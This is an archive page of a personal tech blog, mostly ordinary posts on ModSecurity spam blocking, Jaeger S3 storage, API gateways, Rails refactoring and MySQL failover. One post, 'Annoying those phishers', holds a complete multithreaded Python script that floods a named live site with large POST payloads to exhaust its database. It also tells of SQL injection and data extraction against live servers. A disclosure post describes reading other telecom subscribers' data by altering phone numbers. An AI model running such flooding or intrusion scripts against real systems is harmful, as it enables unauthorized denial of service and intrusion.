Fighting HTTP/Web spammers with ModSecurity
Nov 24, 2021

Recently I encountered a lot of spam registrations and web comments on one of my clients' websites. Normally a configuration in Apache or Nginx would suffice, but it got so bad that I had to automate banning those abusive spammers from the website.

So instead of treating it like a chore and manually adding each abusive IP address to a block list, I used ModSecurity, which was already configured on our web server.

The code snippet below checks the web user's IP address against blacklists: Spamhaus SBL/XBL lists IP addresses tied to spam sources and malware-compromised machines, and Project Honey Pot (http:BL) likewise flags abusive IP sources.

# Block Spam Registrations/Web comments
# Ban for 7 days
SecAction "id:400000,phase:1,initcol:ip=%{REQUEST_HEADERS:X-Forwarded-For},pass,nolog"
SecRule IP:spam "@gt 0" "id:400001,phase:1,chain,deny,status:403,msg:'Spam host %{REQUEST_HEADERS:X-Forwarded-For} already blacklisted'"
SecRule REQUEST_METHOD "POST" "chain"
SecRule REQUEST_URI "/your/website/post/comment/path"

# spamhaus
SecRule REQUEST_URI "/your/website/post/comment/path" "id:400010,chain,deny,log,status:403,msg:'Spam host %{REQUEST_HEADERS:X-Forwarded-For} detected by sbl-xbl.spamhaus.org'"
SecRule REQUEST_METHOD "POST" "chain"
SecRule REMOTE_ADDR "@rbl sbl-xbl.spamhaus.org" "setvar:IP.spam=1,expirevar:IP.spam=604800"

# httpbl
# get your httpblkey by registering at https://www.projecthoneypot.org/
SecHttpBlKey yourhttpblkey
SecRule REQUEST_URI "/your/website/post/comment/path" "id:400012,chain,deny,log,status:403,msg:'Spam host %{REQUEST_HEADERS:X-Forwarded-For} detected by dnsbl.httpbl.org'"
SecRule REQUEST_METHOD "POST" "chain"
SecRule REMOTE_ADDR "@rbl dnsbl.httpbl.org" "setvar:IP.spam=1,expirevar:IP.spam=604800"

# Blacklisted IP Address file
SecRule REQUEST_URI "/your/website/post/comment/path" "chain,id:400020,log,deny,status:403,msg:'Spam host %{REQUEST_HEADERS:X-Forwarded-For} listed in blacklist file'"
SecRule REQUEST_METHOD "POST" "chain"
SecRule REMOTE_ADDR "@ipMatchFromFile /etc/nginx/blacklisted_ips.txt" "setvar:IP.spam=1,expirevar:IP.spam=604800"
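
If you are curious what the @rbl operator does under the hood, a DNSBL lookup is just a DNS query with the IP's octets reversed and the blacklist zone appended (Project Honey Pot's http:BL additionally expects your access key in the query, which is what the SecHttpBlKey directive above provides). Here is a rough Python sketch of the idea, my own illustration rather than anything ModSecurity ships:

import socket

def dnsbl_listed(ip, zone="sbl-xbl.spamhaus.org"):
    # Reverse the octets and append the blacklist zone,
    # e.g. 1.2.3.4 -> 4.3.2.1.sbl-xbl.spamhaus.org
    query = ".".join(reversed(ip.split("."))) + "." + zone
    try:
        socket.gethostbyname(query)  # any A record back means the IP is listed
        return True
    except socket.gaierror:          # NXDOMAIN means the IP is not listed
        return False

print(dnsbl_listed("127.0.0.2"))  # 127.0.0.2 is Spamhaus's documented test entry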

The last rule uses a blacklist file (blacklisted_ips.txt) where you can declare IP blocks yourself if you need to. Example:

123.123.12.0/24
12.34.0.0/16
44.44.44.44/32
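
And roughly what @ipMatchFromFile does with that file is check the client address against each CIDR block. A minimal Python sketch, assuming the same example file as above:

import ipaddress

def ip_blacklisted(ip, path="/etc/nginx/blacklisted_ips.txt"):
    addr = ipaddress.ip_address(ip)
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#"):
                continue  # skip blanks and comments
            if addr in ipaddress.ip_network(line, strict=False):
                return True
    return False

print(ip_blacklisted("123.123.12.7"))  # True, falls inside 123.123.12.0/24
print(ip_blacklisted("8.8.8.8"))       # False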

To automate it further, I check for failed attempts at sending the POST request with a counter and block the IP address once it reaches the counter limit:

# Check that this is a POST
SecRule REQUEST_METHOD "POST" "id:500010,phase:5,chain,t:none,nolog,pass"
# AND check for a failed response (HTTP 500) and increment the counter
SecRule RESPONSE_STATUS "^500" \
 "chain,setvar:IP.bf_counter=+1"
SecRule REQUEST_URI "/your/website/post/comment/path"

# Check for too many failures from a single IP address. Block for 7 days.
SecRule IP:bf_counter "@ge 5" \
   "id:500002,phase:5,pass,t:none, \
   setvar:IP.bf_block,\
   setvar:!IP.bf_counter,\
   expirevar:IP.bf_block=604800"

The snippet above is also useful when you want to block abusive users who attempt login brute-force attacks. Note that it only sets the IP.bf_block variable; you still need a rule that denies requests while IP:bf_block is set, along the lines of rule 400001 above.

Jaeger S3 without the need for Tempo/Loki
Nov 11, 2021

Before working on Jaeger-S3, I was looking not only to store Jaeger traces on S3 but also for a better way to view my traces, and I could not find anything that was not operationally expensive or expensive to rent infrastructure for, so S3 was the way to go, and it scales (Jaeger-S3 now also supports Google GCS and Azure Blob Storage).

I had looked into Tempo/Loki, but going that path would mean more infrastructure requirements: THREE services (Loki, Tempo and Grafana), and finding traces is pretty manual. Tempo aims to support all of the open-source tracing platforms (including OpenTracing), but Jaeger-S3 is focused on Jaeger only.

Ever since Jaeger-S3 was released, I have been speeding ahead with optimizations and even Loki data-format compatibility (this will be a breaking change in Jaeger-S3 v2 and will take some time), for those of you who actually want to use Loki to read Jaeger-S3-generated data. You don't need to upgrade; it is fine to stay on v1 if Loki is not really important to you.

With Jaeger-S3 you don't need Loki or Tempo, and Grafana is optional, for when HTTP basic auth on the Jaeger UI is not really an option and you would like to leverage Grafana's authentication/SSO.

Personally I have been using Grafana with Jaeger (and Jaeger-S3), and I just need Grafana to check the traces. Again: no Tempo, no Loki. Only Jaeger and Grafana.

Jaeger with S3 storage backend
Apr 25, 2021

As a Site Reliability Engineer, part of my job is to collect performance metrics for the services that my team and I manage.

One of those tasks is collecting traces of service performance, and we use Jaeger as we move away from SaaS services that we deemed too expensive.

Jaeger was first developed by Uber and then open-sourced. We decided to use it because it gives us distributed tracing across our Kubernetes cluster, and it is backed by the Linux Foundation as part of the CNCF (Cloud Native Computing Foundation).

Despite that, we realised that Jaeger depends on Elasticsearch or Cassandra, and going that route would be costly - not just the cost of hosting these databases but also the operational cost of maintaining them.

We also looked at other options like Tempo, which supports storing data on S3, but Tempo only allows searching by trace ID, it requires additional infrastructure (Loki, Tempo), and we wanted to go light on resources.

Since Jaeger supports "plugins" via HashiCorp's go-plugin, my team and I decided to build our own, and I volunteered to develop the plugin for S3 storage. The Jaeger-S3 plugin is available here.

This keeps our operational costs as low as possible, and S3 object storage is really cheap for data retention.

Under the hood, we leveraged the boltdb-shipper from Loki's source code, which stores the data (in BoltDB format) on any object storage service (S3, GCS, Azure Blob Storage), as well as Cortex, which Loki also builds on.

It's ready for production and we're shipping version 1.0 soon, so do check it out and test it. (We've only tried S3, which works; we have yet to try GCS or Azure Blob Storage.)

You can also try configuring it with Amazon DynamoDB or Google Bigtable (to store the indexes), which should theoretically work since we use Cortex to interface with the storage backend.

Annoying those phishers (part 2)
Feb 8, 2021

The scammer (phisher) had shut down onlinemaycampaign.com and moved to another domain, campaignmay2u.com, running the same phishing code as onlinemaycampaign.com.

I only went after the phisher again when a victim lost thousands of ringgit after the phisher got the victim's SMS TAC and bought game credits; after that I got in touch with the victim so she could reach the investigating officer.

This scammer was persistent in his (or her) criminal activity, so I had to change my strategy. I managed to find flaws in campaignmay2u.com and extracted all the critical evidence, saved as CSV and JSON.

All this data was submitted to the authorities as evidence.

Although campaignmay2u.com now points to another IP address, I can still access the criminal's phishing site by pointing the domain at the correct IP in my computer's hosts file.

So I am waiting for the authorities to tell me to purge the sensitive data, since I might need to provide more information if they feel the data is incomplete. I have sent them everything I know, including my code that monitors the activity on the phisher's website.

Annoying those phishers
Jan 21, 2021

So a few hours ago a friend alerted me on Facebook about a phishing site. After doing some reconnaissance, I found out that the website was hosted in Turkey and the perpetrator was actually Portuguese.

Phishing site

And this guy was collecting usernames and passwords for a large bank in Malaysia (I am in Malaysia).

I ran a couple of SQL injection scripts, but at the same time I wrote a powerful DoS script that tied up the perpetrator's resources and might trigger an alert from the provider about the activity on their network.

After working on the third version of the Python script, which was heavily threaded, I also made a similar version that sends large payloads to be stored in his database (the row size limit in MySQL is 65,535 bytes). I was hitting his server at 50 Mbit/s running 25 Python threads at one shot.

So with the two scripts, my machine was running 50 threads concurrently.

Python DoS

Of the two scripts, one sends a small payload (to push the auto-increment ID up faster) and the other a bigger payload (about 1.5MB per database row).

The reason I chose to attack using two different payloads is to use up the adversary's resources faster (the table size or table ID limit is reached, or the available database connections get exhausted).

After running it for about half an hour, the perpetrator finally took his website down.

Site 404

Most phishing sites are really simple forms, and you can inspect the requests to launch an attack on them.

The only purpose of such phishing sites is to collect data, and we can use that as the weakness to overload their systems, whether the web code (the number of connections it can use to reach the database) or the database itself (max table size, incremental IDs).

So here is the script (do not abuse it, but you can read it for educational purposes).

It fills the database with large random data, at 500KB per field:

import logging
import threading
import requests
import random, string

def randomword(length):
   letters = string.ascii_lowercase
   return ''.join(random.choice(letters) for i in range(length))

headers = {'User-Agent': 'Mozilla/5.0'}
payload = {'pais':'ru','ip':'0.0.0.0', 'password': randomword(500000), 'systema': randomword(500000), 'ir': randomword(500000)}

def generate_requests(name):
    while True:
        logging.info("Thread %s: starting", name)
        session = requests.Session()
        r = session.post('https://onlinemaycampaign.com/home/m2u/common/indexSend.php',headers=headers,data=payload)
        print(r.text)
        logging.info("Thread %s: finishing", name)

if __name__ == "__main__":
    format = "%(asctime)s: %(message)s"
    logging.basicConfig(format=format, level=logging.INFO,
                        datefmt="%H:%M:%S")

    threads = list()
    for index in range(25):
        logging.info("Main    : create and start thread %d.", index)
        x = threading.Thread(target=generate_requests, args=(index,))
        threads.append(x)
        x.start()

    for index, thread in enumerate(threads):
        logging.info("Main    : before joining thread %d.", index)
        thread.join()
        logging.info("Main    : thread %d done", index)

Introducing NetIdentity
Dec 8, 2020

NetIdentity

I started building this when I found out that most API providers are too costly or have high latency (hello ip2location!). I needed this for Awesell (e.g. for KYC), and Awesell has now been integrated with NetIdentity.

So it was actually designed to solve my own problem, and looking at the potential NetIdentity could have for others, I decided to build it for low latency and high availability.

You can actually use it now on Rakuten's RapidAPI (we still have to work on our own site).

The actual interesting part here is the CDN edges running my serverless code to generate the data, making a call to the origin server ONLY when necessary.

This serverless code runs directly on the CDN edge servers closest to the user's location, backed by a key-value store distributed across the CDN edges (think Japan, EU, US, SG, etc.).
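
As a rough illustration of "call the origin only when necessary", the edge logic is essentially a cache-aside lookup against that distributed key-value store. The sketch below is a hypothetical Python version; the kv object and the origin URL are stand-ins, not the real platform API:

import json
import urllib.request

ORIGIN_URL = "https://origin.example.com/lookup"  # hypothetical origin endpoint

def handle_lookup(ip, kv):
    # kv stands in for the CDN's distributed key-value store (get/put by key).
    cached = kv.get(ip)
    if cached is not None:
        return json.loads(cached)              # served entirely from the edge
    with urllib.request.urlopen(ORIGIN_URL + "?ip=" + ip) as resp:
        data = json.loads(resp.read())         # only cache misses reach the origin
    kv.put(ip, json.dumps(data))
    return data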

There are two tiers in the picture: users get the data via Rakuten RapidAPI or directly from our CDN edge.

Via Rakuten RapidAPI, latency is 130-150ms (still good! ~200ms is already bad) because it has to make an additional trip to the CDN, for example: User -> Rakuten US -> CDN SG.

But I recommend that future users hit our CDN directly to get under 100ms (about 38-80ms).

Disclosure of Celcom API Data Leaks
May 26, 2020

So it's been more than a month, and as a Celcom customer I have seen a lot of updates to my Celcom Life app. I alerted them back then, and I hope they have already taken steps to mitigate the security holes in the Celcom Life API backend.

Back in April, my Celcom Life app behaved strangely when I reloaded my credit and then tried to buy a data plan without refreshing the app.

The request for my data plan did not go through - which it should have. Then I realised that the purchase was being validated against my local Celcom Life app credits; the verification of the credits was not being done on the server.

So I suspected that if the server relied on my phone's 'credit' information, there could be a possibility that anyone could tell the server "Hey, I have RM100 of credit, give me the RM30 data plan for 1 month".

Out of curiosity, I ran my Android emulator and set up a man-in-the-middle attack on the Celcom Life mobile app on the emulator by making sure the Celcom Life app trusted my own certificate.

Little did I expect that this would send me down the rabbit hole and that I would discover many other issues with Celcom Life's API security.

The first step was the Celcom Life app's OTP 2FA: when you request the 2FA token via SMS, the response from the API shockingly contained an internal "analytics" server's username and password.

Celcom OTP

After logging in with the OTP and playing around with the Celcom Life app on my Android emulator, I got to a point where I could see my own SIM's subscribed plans, available plans and data usage.

Then I tried changing the parameters to query information about another random phone number by changing the last digits of my own number (the MSISDN, as telcos call it) and got that number's plan information as well, including its subscription plans, data usage and more.

Celcom API

There is an upstream server behind the Celcom Life API server, probably where the telco provisioning is done. That server serves data in XML, which the Celcom Life API parses and serves as JSON.

This security vulnerability was reported to Celcom on 5 April 2020, and they made updates (judging by their downtime) within the same week.

I did not get as far as checking whether I could get free data plans, but the exposure of customer data was serious enough for me to stop there (since I am a Celcom customer). As much as I suspected that part might be vulnerable, I did not look into it further.

The Celcom Life app handles transactions for credits, data plans, roaming, billing and more for PREPAID AND POSTPAID customers, so I feel it is a really serious headache to know that someone on the same network (Celcom) could gain access to your personal subscriber information.

Incident Timeline:

April 5 - Discovered Analytics and Subscriber data leaks

April 5 - Alerted Celcom

April 8 - Maintenance and Updates

Patching and Compiling SAMBA on macOS Mojave
Nov 19, 2019

The latest versions of macOS do not include Samba; instead they ship their own tool called smbutil, which was imported from FreeBSD.

Even brew (yeah, the package manager) did not want to keep maintaining Samba in its package tree, because compiling Samba on macOS is hell.

But because I wanted to message my wife on her office computer, with Windows messaging popups, while on her office's VPN, I decided to hack the Samba source and make it compile and run on macOS.

The most interesting find is that even the latest macOS uses the rather old editline instead of the more common GNU readline, thanks to the information I got from the blog post HERE.

These are the instructions for samba-4.11.2 on macOS Mojave:

Note: Before you run commands below, make sure you have the latest Xcode installed on your macOS!

  1. Download samba-4.11.2 from https://samba.org
  2. Download the patch file: samba-4.11.2-readline.patch
  3. Uncompress the samba-4.11.2 source file
  4. Copy the patch file to the root samba-4.11.2 directory
  5. run patch -p0 < samba-4.11.2-readline.patch in samba-4.11.2 root directory
  6. Lastly, run ./configure --without-ad-dc --disable-python --without-libarchive --without-acl-support && make && make install
  7. Enjoy! 🙌

Introducing API Vault
Mar 22, 2019

I work mostly on APIs - writing APIs in many languages, with different ways of interacting with each other.

Currently at work I write APIs in Ruby, PHP and Go. This is my current tool stack, though sometimes I might use Rust for background processing or Elixir when needed. Oh yeah, and Python - my favourite tool for working with data.

At work we have many microservices, and each has its own authentication endpoint. That is bad, and a JWT token cannot be reused across those microservices since each one's JWT secret is different.

After looking around for solutions - in particular AuthN/AuthZ offerings, which I find to be really overkill - and since I was looking for simplicity, I took a look at API gateways.

But almost everything I saw was proprietary, or open source but-you-have-to-pay-if-you-use-it-commercially.

The API gateway that almost filled my needs was Express Gateway. But the limiting part was that it does not provide a SQL database connector (MySQL in particular).

So after reading Ben Church's excellent tutorial on writing a reverse proxy in Go, I modified parts of his code to suit my needs for an API gateway.

I talked to Ben Church about licensing my modifications as MIT, and he agreed to it.

In summary, here is what it looks like:

API Vault

I call it “API Vault”. So basically it does these things:

  1. User will authenticate to API Vault.
  2. API Vault returns a JWT Token.
  3. User accesses a microservice via API Vault with their JWT Token.
  4. API Vault “converts” the JWT Token to another Token for accessing the microservice endpoint
  5. User gets data from their microservice endpoint

It is simple.

What API Vault does not do:

  1. It does not do authorization. This should be handled by your microservice, although in theory I could implement it. But different microservices might have different authorization rules.

So basically you need to authenticate to API Vault only once and access your services with just one token.

And here's another thing: your microservices can have different JWT secrets, and API Vault happily does the conversion for you.

Another thing: no changes are needed to your current microservices to use API Vault. Just configure API Vault, and it will use the secrets from your microservices to generate its token for each microservice.
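
To make that "conversion" concrete: conceptually, API Vault validates the incoming token with its own secret and re-signs the same claims with the target microservice's secret. API Vault itself is written in Go; the snippet below is only a hypothetical Python/PyJWT sketch of the idea, with made-up secrets and service names:

import jwt  # PyJWT

GATEWAY_SECRET = "api-vault-secret"                  # hypothetical gateway secret
SERVICE_SECRETS = {"billing": "billing-jwt-secret"}  # hypothetical per-service secrets

def convert_token(incoming_token, service):
    # Validate the token the user obtained from the gateway...
    claims = jwt.decode(incoming_token, GATEWAY_SECRET, algorithms=["HS256"])
    # ...then re-sign the same claims with the target microservice's own secret,
    # so the microservice can verify it with the secret it already uses.
    return jwt.encode(claims, SERVICE_SECRETS[service], algorithm="HS256")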

Your microservices can be in a private network while API Vault is the only thing exposed to the public for the user.

Even if your microservices are exposed to the public, a user who has authenticated with API Vault cannot use the token given by API Vault to access those microservice endpoints directly.

API Vault supports MySQL, PostgreSQL and Microsoft SQL.

You can check out the Github Project here (don’t forget to star ⭐️ it!)

Phonetic Jawi Keyboard Layout for Windows
Dec 23, 2018

Supports Windows 7 (32 or 64 bit), Windows 8 and Windows 10.

Download it from here: Jawi Keyboard Phonetic Layout (QWERTY)

SHA256 SUM - 8a1f1e30a648ca80b4c7f41a38dbf7beb015f271d66c6794be51211098460157

  1. Unzip the file
  2. Go to ‘jawi’ folder
  3. Click on ‘setup’
  4. You will see 'MS' Malay (Malaysia) or MSA Malay (Malaysia) on the taskbar once the installation is successful

UPDATE: fix ظ, ط and ث

Why I still use VIM (with exceptions)
Jun 17, 2017

Why do I still use VIM for most of my coding needs?

Well, I started off as a system administrator, and most of the time I would shell into a server and run my favorite editor.

I recall that when I was starting to use Linux, around 1997, I used the now obsolete pico, and then my co-worker introduced me to vi.

vi's low overhead over the network was a plus, and I also started to write C code on my local machine using vi.

Many years later, I still use a variant of vi called vim.

But okay, enough of the history of how I got to use vim. Vim to me is flexible: I can write PHP, Ruby, Python, Node and Go with vim flawlessly supporting the needs of coding in almost every language I want to write in, without purchasing an editor for each language.

For example, IntelliJ has PyCharm, PhpStorm and RubyMine, and I don't want to purchase IDEs that make me "buy" per programming language. Don't get me wrong, they are GREAT IDEs and help my co-workers manage their code, but I hated the idea of buying something that I will use 10% of the time. (I write in various languages - I don't stick to one language.)

The only IntelliJ product I use as an IDE is Android Studio (no choice, dude, it's Java), and there isn't another option that helps me write Java code well. (Even so, I hate Android Studio, especially when it suggests a wrong UI variable, for example.) You have absolutely no choice but to use an IDE for Java, to be honest.

I could use Sublime, but I still have problems getting the hang of it. Or maybe TextMate (it's clean and nice, but it is macOS only - I do use Linux as my workstation at times when I don't have a Mac).

Maybe I will make Sublime my primary editor one day, but I still love working in a terminal because of its flexibility.

Structuring Grape API
May 24, 2017

Most of the information on the Grape gem (Ruby) is very limited, and it does not show you how to structure your API versions.

But some of you will probably ask me, "Why use the Grape gem when you have the new rails-api integration in Rails 5?"

As far as I understand, you would use rails-api (the gem, not the baked-in Rails 5 --api flag) when you also want server-side rendering, so you have both an API and a web app running as a monolithic app. But I prefer the Grape gem as it is more flexible (AFAIK) and has a great community.

Assuming you have the Grape gem installed in your Rails 5 app:

Add this code into config/application.rb and restart your app:

    config.paths.add File.join('app', 'api'), glob: File.join('**', '*.rb')
    config.autoload_paths += Dir[Rails.root.join('app', 'api', '*')]

Now,

  1. Create the directory api in app
  2. Create a file called api.rb in the api directory.
  3. In this api.rb file you should have at least the code:
    class API < Grape::API
      insert_after Grape::Middleware::Formatter, Grape::Middleware::Logger
      format :json # required to set default all to json
      mount V1::Base => '/v1'
    end
    

In the future, if you decide you want a second version (i.e. V2), you can directly mount the new V2 code here.

Next, create the v1 directory within the api directory: mkdir v1

Now, in the v1 directory, we will have base.rb, which is the root where you specify all your API endpoints for V1.

Your base.rb should be configured like below:

module V1
  class Base < Grape::API
    mount Products::Data
  end
end

You can mount as many endpoints as you wish, but I am adding only one for demonstration.

Next, create a products directory (assuming you have a model called Product) WITHIN the v1 directory: mkdir products

In the products directory, create a file called data.rb with the following contents:

module V1
  module Products
    class Data < Grape::API

      resource :products do
        desc 'List all Products'
        get do
          Product.all
        end

        desc 'Show specific product'
        get ':id' do
          Product.find(params[:id])
        end
      end
    end
  end
end

That's it! You can try the good old curl to test it out (this assumes the API is mounted in config/routes.rb, for example with mount API => '/api'):

curl http://localhost:3000/api/v1/products

Fat Models, Skinny Controller vs Separation of concerns, Part 2
Mar 20, 2017

In this part 2 of Fat Models, Skinny Controller vs Separation of Concerns, I am going to focus on moving code from "fat models" into a concern.

For example, take omniauth-facebook with the login gem Devise.

In a "fat model" configuration, the business logic sits in the model, like below, naming the method as a class method by adding self. to from_omniauth.

class User < ApplicationRecord

    def self.from_omniauth(auth)
     if user = find_by_email(auth.info.email)  # search your db for a user with email coming from fb
       return user  #returns the user so you can sign him/her in
     else
       user = create(provider: auth.provider,    # Create a new user if a user with same email not present
                          uid: auth.uid,
                          email: auth.info.email,
                          password: Devise.friendly_token[0,20])
       user.create_account(name: auth.info.name, # you need to check how to access these attributes from auth hash by using a debugger or pry
                           address: auth.info.location,
                           image: auth.info.image
                           )
       return user
     end
    end
end

So you would access this method (usually in the controller) as User.from_omniauth, since the code lives in the User class (model).

To move this code to a concern, you will have to add a new file, in this example models/concerns/omniauth.rb.

You will need a module Omniauth with extend ActiveSupport::Concern to extend the model, and you will need to add the business logic inside module ClassMethods, removing the self. prefix.

module Omniauth
  extend ActiveSupport::Concern

  module ClassMethods
    def from_omniauth(auth)
     if user = find_by_email(auth.info.email)  # search your db for a user with email coming from fb
       return user  #returns the user so you can sign him/her in
     else
       user = create(provider: auth.provider,    # Create a new user if a user with same email not present
                          uid: auth.uid,
                          email: auth.info.email,
                          password: Devise.friendly_token[0,20])
       user.create_account(name: auth.info.name, # you need to check how to access these attributes from auth hash by using a debugger or pry
                           address: auth.info.location,
                           image: auth.info.image
                           )
       return user
     end
    end
  end
end

while in the model the code is refactored down to a single line: include Omniauth.

class User < ApplicationRecord
  include Omniauth
end

You can still call User.from_omniauth from the controller as usual, and now we have moved from a "fat models" setup to concerns.

Fat Models, Skinny Controller vs Separation of concerns, Part 1
Mar 16, 2017

I started with Rails 3.2.13, and in those days the Rails community recommended keeping the Rails controller skinny (with only request handling code) and making the model fat with the business logic.

In Rails 4.1, "concerns" were introduced to separate the business logic out of the controller or model; concerns help you build the application around the single responsibility principle. I did not pay attention to concerns until recently, when I had a lot of business logic in my model.

So I have been doing a lot of refactoring of the code for a job listing site.

An example is the following code, without concerns:

class JobsController < ApplicationController

  def index
    if params[:query].present? && params[:location].present?
      @jobs = Job.search(params[:query], fields: [ { title: :word_start }, { state: :word_start }],
                                           where: { state: params[:location], published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:query], fields: [ { title: :word_start }, { state: :word_start }],
                                           where: { state: params[:location], published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    elsif params[:query].blank? && params[:location].present?
      @jobs = Job.search(params[:location], where: { published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:location], where: { published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    elsif params[:query].present? && params[:location].blank?
      @jobs = Job.search(params[:query], where: { published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:query], where: { published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    else
     @jobs = Job.where(published: true).where("published_date >= ?", 1.month.ago).page(params[:page]).per(7)
      @jobs_sponsored = Job.where(published: true).where("published_date >= ?", 1.month.ago).where("jobs.listing_type = ? OR jobs.listing_type = ?", 2, 3).order("RANDOM()").limit(2)
    end

  end
end

Bad, innit? Business logic in the controller?

After refactoring, I have the business logic in a concern (i.e. app/controllers/concerns/jobs_query.rb) rather than in the controller, like below:

module JobsQuery
  extend ActiveSupport::Concern

   def jobs_with_job_name_and_location
      @jobs = Job.search(params[:query], fields: [ { title: :word_start }, { state: :word_start }],
                                           where: { state: params[:location], published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:query], fields: [ { title: :word_start }, { state: :word_start }],
                                           where: { state: params[:location], published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
   end

    def jobs_with_location
      @jobs = Job.search(params[:location], where: { published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:location], where: { published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    end

    def jobs_with_job_name
      @jobs = Job.search(params[:query], where: { published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:query], where: { published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    end

    def all_other_jobs
      @jobs = Job.where(published: true).where("published_date >= ?", 1.month.ago).page(params[:page]).per(7)
      @jobs_sponsored = Job.where(published: true).where("published_date >= ?", 1.month.ago).where("jobs.listing_type = ? OR jobs.listing_type = ?", 2, 3).order("RANDOM()").limit(2)
    end
end

Note the include JobsQuery below: Rails will autoload the concern based on its filename and path, following the Ruby on Rails convention.

class JobsController < ApplicationController
  include JobsQuery

  def index

    if params[:query].present? && params[:location].present?
      jobs_with_job_name_and_location
    elsif params[:query].blank? && params[:location].present?
      jobs_with_location
    elsif params[:query].present? && params[:location].blank?
      jobs_with_job_name
    else
      all_other_jobs
    end

  end
end

Looks short and sweet, innit?

Re-discovered a history of my internet
Mar 16, 2017

I do search for myself on search engines, and a few days back I started googling "Muhammad Nuzaihan FreeBSD" (you are not likely to find it with just "Muhammad Nuzaihan"), found my old blog at https://polycompute.wordpress.com/2014/07/ and rediscovered a really important picture of where I was in the early 2000s.

Here is the glorified image of my setup (from the right): FreeBSD on an Intel Pentium as the web server, OpenBSD on a 486 DX2-66 as the mail server (because of the advanced anti-spam features OpenBSD had with spamd/PF), and NetBSD on another 486 DX2-66 as a mere testing server.

I could host all that stuff on a static IP which my ISP provided back then (the now defunct SingTel Magix). :-)

Polyglot programming and the benefits
Mar 16, 2017

Polyglot programming is the understanding and knowledge of a wide range of programming languages and paradigms.

I have been enjoying writing code in Ruby, Python, NodeJS, GoLang and PHP, and while doing so I am exposed to the particular conditions of writing in each of these languages.

Even though I had been a fan of C programming for many years, which limited my scope to systems development, in recent years (circa 2011-2012) I started exploring Ruby, and it was enjoyable for someone just getting into web development.

With Ruby, I used the Ruby on Rails framework (which I still use today to prototype - fast enough to make an MVP, or Minimum Viable Product).

The differences between the languages helped me stay flexible in solving a problem, taking the paradigms one language exposes and applying them to other languages besides the one I am working in.

For example, in Python we use try and except a lot to make errors more forgiving. I learned Python after dabbling in Ruby, and I applied what I learned from Python's try/except to Ruby's equivalent, begin/rescue.
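
A tiny, contrived Python example of that forgiving style (my own illustration, not from any particular project):

def parse_port(raw):
    try:
        return int(raw)      # happy path: the value is a valid integer
    except ValueError:
        return 8080          # fall back to a default instead of crashing

print(parse_port("9000"))    # 9000
print(parse_port("oops"))    # 8080

The Ruby equivalent wraps the same call in a begin/rescue block.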

In other cases, where we were required to re-engineer a monolithic application into microservices, I knew I had to scale the code that collects analytics data with GoLang, and when we could not scale our PHP reporting app, I rewrote it in Python. I have been using Python with the Pandas library for generating reports, and it is quick!

GoLang is the language I enjoy writing most, because I came from a C background, I love performance, and Go has concurrency as a first-class citizen.

I have been dabbling with Haskell for a while. I like that it is purely functional; lazy evaluation (have you ever run out of memory?) and having no side effects are what I love most, but I couldn't apply it in production, so it remains more of a hobby language for me. Haskell is good when you are learning functional programming.

After 15 years as a systems and network engineer (yes, network as well) without much software development knowledge, all of this now makes me more flexible in taking on development roles and makes it possible to architect the infrastructure at the lowest level.

Sometimes you have to be more pragmatic and allow yourself to take different approaches when developing software, knowing that you can write the same code in the language that achieves the same result in less time and with fewer lines of code.

MySQL High-Availability and Load Balancing
Feb 6, 2017

Introduction

In cases where database failure is not acceptable, there are ways to protect the data from database failures, especially the single point of failure you get when only one database server is running.

MySQL has a lot of options for failover and load balancing, from MySQL Cluster and a MySQL master-slave setup with MySQL Router, to a lower-level load balancer using Linux Virtual Server (a load balancer and failover router using the VRRP protocol) in front of a MySQL master-master setup.

Choosing a Setup

MySQL Cluster is intended for large MySQL installations (i.e. a server farm with 10-20 MySQL servers), which is more than our installation needs, and a MySQL master-slave setup only allows writes on one server (the master) while the slaves serve reads.

Our choice is a master-master MySQL setup with Linux Virtual Server (LVS/keepalived), designed to allow writes to either master (e.g. 2 master MySQL servers).

The web application can write to either master MySQL server, but we need to detect when one master is down or under high load and redirect connections to the other.

This is where LVS (keepalived) comes in. keepalived is an LVS 'router' which keeps track of the health of the real servers (in this case the master MySQL servers) and redirects the MySQL client connection from the web application to one of the MySQL servers.

If either MySQL server fails keepalived's health check, it is removed from keepalived's internal routing and connections are redirected to the other MySQL master.

keepalived holds a floating IP (also called a virtual IP) which the web application connects to, and keepalived redirects the connection to either MySQL server.

We have two keepalived routers, one MASTER and one BACKUP, sharing this virtual IP; if one keepalived router fails (e.g. the MASTER), the other instance (the BACKUP) takes over the virtual IP that the web application connects to.

NOTE: In this post there are two kinds of master: the MySQL master and the LVS MASTER.

Diagram

High-Availability Diagram

Configuration Steps

MySQL Server Setup

Let’s assume the MySQL server IP is as follows:

Current running MySQL Server: 192.168.1.10
New MySQL Server: 192.168.1.11

Modifications to the current server:

  1. Stop all database activity by shutting down the Web application
  2. Dump the MySQL database from the running server: $ mysqldump -u <youruser> -p mydatabase > database_dump.sql
  3. On the CURRENT running MySQL server, back up a copy of my.cnf: $ sudo cp /etc/mysql/my.cnf /etc/mysql/my.cnf.orig
  4. On the CURRENT running MySQL server, edit /etc/mysql/my.cnf and add these options under [mysqld]:

    bind-address  = 0.0.0.0
    log-bin = /var/log/mysql/mysql-bin.log
    binlog-do-db=mydatabase # this is the database we will replicate
    binlog-ignore-db=mysql
    binlog-ignore-db=test
    server-id = 1
    
  5. Restart the MySQL Server
  6. Go to the mysql console and type in SHOW MASTER STATUS; IMPORTANT! Take note of File and Position. Example output:

